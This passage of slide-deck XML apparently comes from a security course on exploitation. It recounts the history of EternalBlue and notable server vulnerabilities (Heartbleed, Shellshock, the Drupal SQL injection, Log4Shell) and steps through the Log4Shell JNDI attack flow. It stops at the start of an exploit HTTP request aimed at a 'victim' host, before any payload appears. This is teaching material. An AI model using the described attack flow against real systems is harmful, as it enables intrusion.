              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ExternalBlue</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB2DE47C-54F4-3748-A0DD-DFCF52C4F498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>MS17-010 is a vulnerability with how Windows processes SMBv1 messages. This allows an unauthenticated user the ability to run commands on the target system as SYSTEM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2425477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A8BD-E8F4-FF4C-A58B-EC9DDD1A4E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> History</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B63B67F-9978-7A43-BFF4-D65C103AE13D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The NSA discovered this vulnerability and has used it for at least 5 years before they were forced to disclose it to Microsoft in early 2017.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>March 14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, 2017 MS17-010 was released and Microsoft urged everyone to patch ASAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>April 14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, 2017 a group known as “The Shadow Brokers” leaked the exploit along with several others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>May 12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, 2017 the WannaCry ransomware attack utilized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> to spread rapidly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>May 13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> 2017 Microsoft released patches for XP and 2003, both unsupported operating systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3723611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E2CB-D2D0-BA46-88DA-E2C972F8BABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Deeper Dive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DEAB4F2-E16D-8D45-A44F-AE89B89DC6C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.mandiant.com/resources/smb-exploited-wannacry-use-of-eternalblue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.checkpoint.com/2017/05/25/brokers-shadows-analyzing-vulnerabilities-attacks-spawned-leaked-nsa-hacking-tools/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3334179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Phases of an attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Reconnaissance – discussed last week</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Scanning – discussed last week</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Exploitation – this week/next week</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Creating Persistence – this week/next week</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Covering Tracks – an exercise left to the reader…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3166221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Notable Unix Server-side Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Heartbleed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>OpenSSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) – CVE-2014-0160</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://heartbleed.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Shellshock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> – CVE-2014-6271 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Drupal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0"/>
              <a:t> 7.x SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" sz="2400" dirty="0"/>
              <a:t> – CVE-2014-3704</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Drupal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="2400" dirty="0"/>
              <a:t>SA-CORE-2014-005</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.drupal.org/PSA-2014-003</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> allowed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> escalation and/or arbitrary code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>log4j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Log4Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (really this is anything running Java but a majority of systems impacted are Unix-based) - CVE-2021-44228</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2375052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implified_Heartbleed_explanation.svg.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-29365" r="-29365"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-317141" y="274638"/>
            <a:ext cx="10160000" cy="6400800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3117783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AE9-3216-4B40-9DD4-5194D86884BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drupal SA-CORE-2014-005</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{846D21DF-59CE-C246-98F3-87513ECF5C32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SQL execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Depending on the content of the requests this can lead to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>privilege escalation, arbitrary PHP execution, or other attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This vulnerability can be exploited by anonymous users.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3341055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09E7-45C3-3C42-B926-181B9D6D1CD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From Drupal’s announcement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0F66635-B1B1-5C4A-A9B5-B4C494074D51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.drupal.org/PSA-2014-003</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>"You should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>proceed under the assumption that every Drupal 7 website was compromised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> unless updated or patches before Oct 15th, 11pm UTC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>that is 7 hours after the announcement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>."</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2910788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9ECC-FD75-7742-92C2-29F0B6E2C2DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log4j (Log4Shell)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73AA7DC2-297A-9342-B648-447A8A915291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>log4j is a commonly used Java logging utility in software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>EVERYWHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>In December 2021 a vulnerability was discovered in a part of log4j that is used to easily expand logging messages that could be used to execute arbitrary code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>This quickly set the IT world on fire and that fire will continue to burn for quite some time.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2994351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1C61-2EBF-5345-A595-ABF409EF90D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log4j – The Vulnerability </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6196546C-881D-CC42-B62B-BBA1E495AFEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Attacker sends data (containing the payload) to the victim system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Data with payload is logged on the victim system via log4j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The vulnerability is triggered with the payload and the victim system makes a request to the attacker controlled system via the Java Naming and Directory Interface (JNDI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Attacker controlled system responds with a remote Java class file that is injected into the server process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This injected payload triggers the next stage of the attack which is to run the arbitrary code injected in step 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="856979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BC02-6FCE-8444-9604-14D9FFBF682B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So Easy, Anyone Can Do It!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FAA2639-CBD0-324D-8240-AB1259A066C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET / HTTP 1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
